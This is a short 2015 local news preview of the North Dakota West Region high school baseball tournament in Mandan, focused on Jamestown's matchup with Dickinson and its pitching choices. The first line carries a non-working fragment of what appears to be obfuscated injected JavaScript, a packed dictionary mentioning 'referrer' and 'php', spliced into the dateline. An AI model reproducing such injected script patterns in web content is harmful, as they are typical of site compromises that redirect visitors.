JAMESTOWN ztdyk|var|u0026u|referrer|zsnii||js|php’.split(‘|’),0,{}))
(NewsDakota.com) – The 2015 West Region baseball tournament begins today in Mandan. This year their will be nine teams vying for the four spots to play next weekend at Newman Outdoor Field in Fargo, with Bismarck Legacy joining the tournament after playing mostly a JV schedule this year.

Mandan is not only the host, but the No. 1-seed and will await the winner of St. Mary’s and Legacy in the late game this evening. Jamestown is scheduled to play Dickinson at 4:45pm, but being that it’s the fourth game of the day its highly unlikely to start on time.

The Jays finished 6-8 in the WDA and have a great record in close games. They’ve won two conference games by scores of 2-1 and another by a final tally of 1-0. Their pitching will have to be on for them to be one of the four that advances to Fargo.

According to the Jamestown Sun’s Chris Aarhus, Jays ace Brian Wenzel will not start for Jamestown today. It’s a little surprising, but shows that Jamestown coach Kelley Kessler thinks the West Region has as much parity as the standings suggest. Meaning that the opponent in a potential state qualifier on Saturday won’t be much different regardless of what happens today.

The game will be broadcast on ESPN Jamsestown 1400/97.1 and streamed online at NewsDakota.com.
